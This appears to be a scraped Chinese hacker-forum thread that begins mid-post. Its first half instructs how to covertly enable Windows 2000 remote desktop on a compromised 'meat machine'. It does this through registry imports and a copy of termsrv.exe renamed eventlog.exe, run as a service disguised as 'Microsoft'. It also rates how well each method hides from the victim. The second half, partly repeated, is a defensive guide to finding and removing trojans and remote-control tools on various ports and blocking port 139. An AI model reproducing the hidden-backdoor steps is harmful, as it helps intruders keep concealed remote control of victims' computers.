[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer]
\"EnableAdminTSRemote\"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
\"TSEnabled\"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermDD]
\"Start\"=dword:00000002

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
\"Start\"=dword:00000002

[HKEY_USERS\\.DEFAULT\\Keyboard Layout\\Toggle]
\"Hotkey\"=\"1\"

-----------
2.重新起动\"肉机\"。

3.使用本地的3398客户端，连接 \"肉机\" .

4.优(缺)点:

A.\"肉机\"中 \"控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务\" 仍然处于未安装状态.
B.\"肉机\"中 \"开始-->程序-->管理工具\" 没有任何变动.
C.\"肉机\"中 \"开始-->程序-->管理工具-->服务-->Terminal Services\" 变为 \"已起动\" 和\"自动\".
D.\"肉机\"中 \"Windows 任务管理器-->进程\" 内,增加 \"Termsrv.exe\".

5.与\"sysocmgr /iysoc.inf /u:u.txt /q\" 的比较:
--------------------------------------------------------------------------------

10 没事来黑狼学技术的朋友，进来看看对你们有利无害

A.\"肉机\"中 \"控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务\" 处于已安装状态.
B.\"肉机\"中 \"开始-->程序-->管理工具\" 增加 \"终端服务管理器\",\"终端服务配置\" 和 \"终端服务客户端生成器\".
C.\"肉机\"中 \"开始-->程序-->管理工具-->服务-->Terminal Services\" 变为 \"已起动\" 和\"自动\".
D.\"肉机\"中 \"Windows 任务管理器-->进程\" 内,增加 \"Termsrv.exe\".
E.需要拷贝几兆的文件到\"肉机\"中.

二.抛砖引玉性\"隐蔽\"安装:

1.将\"肉机\"中 \"c:\\winnt\\system32\\termsrv.exe\" 文件作一备份,命名为\"eventlog.exe\",仍将其放入目录 \"c:\\winnt\\system32\\\"

2.将如下注册表键值导入 \"肉机\" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache]
\"Enabled\"=\"0\"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]
\"ShutdownWithoutLogon\"=\"0\"

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer]
\"EnableAdminTSRemote\"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]
\"TSEnabled\"=dword:00000001

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermDD]
\"Start\"=dword:00000002

[HKEY_USERS\\.DEFAULT\\Keyboard Layout\\Toggle]
\"Hotkey\"=\"1\"

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SecuService]
\"Start\"=dword:00000002
\"ErrorControl\"=dword:00000001
\"ImagePath\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
\"ObjectName\"=\"LocalSystem\"
\"Type\"=dword:00000010
\"Description\"=\"Microsoft\"
\"DisplayName\"=\"Microsoft\"

---------------

3.重新起动\"肉机\"。

4.使用本地的3398客户端，连接“肉机”。

5.优(缺)点:

A.\"肉机\"中 \"控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务\" 仍然处于未安装状态.
B.\"肉机\"中 \"开始-->程序-->管理工具\" 没有任何变动.
C.\"肉机\"中 \"开始-->程序-->管理工具-->服务-->Terminal Services\" 没有变化,保持原始状态.
D.\"肉机\"中 \"开始-->程序-->管理工具-->服务\" 增加 \"Microsoft\"
E.\"肉机\"中 \"Windows 任务管理器-->进程\" 内,增加 \"eventlog.exe\".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: \"sysocmgr /iysoc.inf /u:u.txt /q\" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 \"sysoc.inf\".\"sysoc.inf\" 是安装信息文件,位于 \"c:\\winnt\\inf\". 打开它,在 \"[Components]\" 节,找到与 \"终端服务\" 有关的条目:

\"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2\"

这里引出另外一个安装信息文件: \"TsOc.inf\". 这个文件同样位于 \"c:\\winnt\\inf\".

打开这个文件,你会发现,如同 windows 环境下的软件安装, \"终端服务\" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 \"File Sections\" 部分,你会发现 \"终端服务\" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 \"终端服务\" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是\"终端服务\"客户端软件,既 \"开始-->程序-->管理工具-->终端服务客户端生成器\" 生成客户软盘需要的文件.

--------------------------------------------------------------------------------

11 没事来黑狼学技术的朋友，进来看看对你们有利无害

各位 \"黑友\" 提供的包或工具,里面包括的W2k源文件,都是 \"tsc32\" 打头的. 关连 \"TsOc.inf\" 的 \"File Sections\" 部分和另外一个文件 \"c:\\winnt\\inf\\layout.inf\",你将会得到证实.

\"终端服务\"的安装,需要注册俩个 \"DLL\". 这俩个 \"DLL\" 同样早早就住在系统里,想必它们一定也有了身份证.

\"TsOc.inf\" 文件一半的内容是关于修改注册表. 但\"终端服务\" 需要的\"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40\" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, \"/u:\" 参数后面的无人职守安装信息文件 \"u.txt\". \"TsEnable = on\" ?

\"TsOc.inf\" 文件 [Optional Components] 节中有三个选项, \"TerminalServices\", \"TSEnable\" ,\"TSClients\".

\"TerminalServices\" 如上所述,在系统初始安装时,已经就序. \"TSClients\" 与 \"终端服务\" 没有直接的关系.

我们在 \"TsOc.inf\" 找到 \"[TsEnable]\" 节. 此节中有用的信息只有一条 \"ToggleOnSection = TerminalServices.ToggleOn\". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 \"Reg.ToggleOn\", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?







常用端口关闭方法:

113端口木马的清除（仅适用于windows系统）：
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果：
Pid Process Port Proto Path
392 svchost -> 113 TCP C:\\WINNT\\system32\\vhos.exe

我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为
c:\\winnt\\system32下。
3.确定了木马程序名（就是监听113端口的程序）后，在任务管理器中查找到该进程，
并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序，在注册表里查找刚才找到那个程序，
并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。（通常木马还会包括其他一些程序，如
rscan.exe、p***ec.exe、ipcpass.dic、ipcscan.txt等，根据
木马程序不同，文件也有所不同，你可以通过察看程序的生成和修改的时间来确定与
监听113端口的木马程序有关的其他程序）
6.重新启动机器。

3389端口的关闭：
首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先
确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

win2000关闭的方法：
win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，
选中属性选项将启动类型改成手动，并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services
服务项，选中属性选项将启动类型改成手动，并停止该服务。
winxp关闭的方法：
在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

4899端口的关闭：
首先说明4899端口是一个远程控制软件（remote administrator)服务端监听的端口，他不能
算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服
务是否是你自己开放并且是必需的。如果不是请关闭它。

关闭4899端口：
请在开始-->运行中输入cmd(98以下为command),然后cd C:\\winnt\\system32(你的系统
安装目录），输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence

到C:\\winnt\\system32(系统目录）下删除r_server.exe admdll.dll radbrv.dll三个文件


5800，5900端口：

1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置（通常会是c:\\winnt\\fonts\\


--------------------------------------------------------------------------------

12 没事来黑狼学技术的朋友，进来看看对你们有利无害
explorer.exe)
2.在任务管理器中杀掉相关的进程（注意有一个是系统本身正常的，请注意！如果错杀可以重新
运行c:\\winnt\\explorer.exe)
3.删除C:\\winnt\\fonts\\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run中的
Explorer项。
5.重新启动机器。

6129端口的关闭：

首先说明6129端口是一个远程控制软件（dameware nt utilities)服务端监听得端口，他不是
一个木马程序，但是具有远程控制功能，通常的杀毒软件是无法查出它来的。请先确定该服务
是否是你自己安装并且是必需的，如果不是请关闭。

关闭6129端口：
选择开始-->设置-->控制面板-->管理工具-->服务
找到DameWare Mini Remote Control项点击右键选择属性选项，将启动类型改成禁用后
停止该服务。
到c:\\winnt\\system32(系统目录）下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\DWMRCS表项删除。

1029端口和20168端口：

这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见：Lovgate蠕虫：http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/
TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具：http://it.rising.com.cn/service/ ... ovGate_download.htm
使用方法：下载后直接运行，在该程序运行结束后重起机器后再运行一遍该程序。

45576端口：

这是一个代理软件的控制端口，请先确定该代理软件并非你自己安装（代理软件会给你的机器带
来额外的流量）

关闭代理软件：
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务（通常为SkSocks），将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同，下面就来分别描述。
　　针对使用Windows 9x系统拨号上网用户，可以不必登录到NT局域网络环境，打开控制面板，然后双击“网络”图标，在“主网络登录”中选择“Microsoft友好登录”，不必选择“Windows网络用户”方式。此外，也不必设置“文件打印共享”
　　对于Windows NT用户，可以取消NetBIOS与TCP/IP协议的绑定，打开“控制面板”，然后双击“网络”图标，在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”，并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标，然后选择“属性”命令，打开“网络和拨号连接”对话框，用鼠标右键单击“本地连接”图标，然后执行“属性”命令，打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”，在打开的对话框中单击〔高级〕按钮。打开“高级TCP/IP设置”对话框，选择“选项”选项卡，在列表中单击选中“TCP/IP筛选”选项
　　单击〔属性〕按钮，在“只允许”单击〔添加〕按钮，填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”，选择一条空规则，设置数据包方向为“接收”，对方IP地址选“任何地址”，协议设定为“TCP”，本地端口设置为“139到139”，对方端口设置为“0到0”，设置标志位为“SYN”，动作设置为“拦截”，最后单击〔确定〕按钮，并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.了解139端口是为了更好地

经常不用的端口可以通过关闭139端口的方法来关闭。




常用端口关闭方法:

113端口木马的清除（仅适用于windows系统）：
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果：
Pid Process Port Proto Path



作者：黑夜幽灵
--------------------------------------------------------------------------------

13 没事来黑狼学技术的朋友，进来看看对你们有利无害
392 svchost -> 113 TCP C:\\WINNT\\system32\\vhos.exe

我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为
c:\\winnt\\system32下。
3.确定了木马程序名（就是监听113端口的程序）后，在任务管理器中查找到该进程，
并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序，在注册表里查找刚才找到那个程序，
并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。（通常木马还会包括其他一些程序，如
rscan.exe、p***ec.exe、ipcpass.dic、ipcscan.txt等，根据
木马程序不同，文件也有所不同，你可以通过察看程序的生成和修改的时间来确定与
监听113端口的木马程序有关的其他程序）
6.重新启动机器。

3389端口的关闭：
首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先
确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

win2000关闭的方法：
win2000server 开始-->程序-->管理工具-->服务里找到Terminal Services服务项，
选中属性选项将启动类型改成手动，并停止该服务。
win2000pro 开始-->设置-->控制面板-->管理工具-->服务里找到Terminal Services
服务项，选中属性选项将启动类型改成手动，并停止该服务。
winxp关闭的方法：
在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

4899端口的关闭：
首先说明4899端口是一个远程控制软件（remote administrator)服务端监听的端口，他不能
算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服
务是否是你自己开放并且是必需的。如果不是请关闭它。

关闭4899端口：
请在开始-->运行中输入cmd(98以下为command),然后cd C:\\winnt\\system32(你的系统
安装目录），输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence

到C:\\winnt\\system32(系统目录）下删除r_server.exe admdll.dll radbrv.dll三个文件


5800，5900端口：

1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置（通常会是c:\\winnt\\fonts\\
explorer.exe)
2.在任务管理器中杀掉相关的进程（注意有一个是系统本身正常的，请注意！如果错杀可以重新
运行c:\\winnt\\explorer.exe)
3.删除C:\\winnt\\fonts\\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run中的
Explorer项。
5.重新启动机器。

6129端口的关闭：

首先说明6129端口是一个远程控制软件（dameware nt utilities)服务端监听得端口，他不是
一个木马程序，但是具有远程控制功能，通常的杀毒软件是无法查出它来的。请先确定该服务
是否是你自己安装并且是必需的，如果不是请关闭。

关闭6129端口：
选择开始-->设置-->控制面板-->管理工具-->服务
找到DameWare Mini Remote Control项点击右键选择属性选项，将启动类型改成禁用后
停止该服务。
到c:\\winnt\\system32(系统目录）下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\DWMRCS表项删除。

1029端口和20168端口：

这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见：Lovgate蠕虫：http://it.rising.com.cn/newSite/ ... rus/Antivirus_Base/
TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具：http://it.rising.com.cn/service/ ... ovGate_download.htm
使用方法：下载后直接运行，在该程序运行结束后重起机器后再运行一遍该程序。

45576端口：

这是一个代理软件的控制端口，请先确定该代理软件并非你自己安装（代理软件会给你的机器带
来额外的流量）

关闭代理软件：
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务（通常为SkSocks），将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同，下面就来分别描述。
　　针对使用Windows 9x系统拨号上网用户，可以不必登录到NT局域网络环境，打开控制面板，然后双击“网络”图标，在“主网络登录”中选择“Microsoft友好登录”，不必选择“Windows网络用户”方式。此外，也不必设置“文件打印共享”
　　对于Windows NT用户，可以取消NetBIOS与TCP/IP协议的绑定，打开“控制面板”，然后双击“网络”图标，在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”，并重新启动计算机即可。
Windows 2000用户可以使用鼠标右键单击“网络邻居”图标，然后选择“属性”命令，打开“网络和拨号连接”对话框，用鼠标右键单击“本地连接”图标，然后执行“属性”命令，打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”，在打开的对话框中单击〔高级〕按钮。打开“高级TCP/IP设置”对话框，选择“选项”选项卡，在列表中单击选中“TCP/IP筛选”选项
　　单击〔属性〕按钮，在“只允许”单击〔添加〕按钮，填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”，选择一条空规则，设置数据包方向为“接收”，对方IP地址选“任何地址”，协议设定为“TCP”，本地端口设置为“139到139”，对方端口设置为“0到0”，设置标志位为“SYN”，动作设置为“拦截”，最后单击〔确定〕按钮，并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.了解139端口是为了更好地

经常不用的端口可以通过关闭139端口的方法来关闭。

你们觉得好就顶下。。。。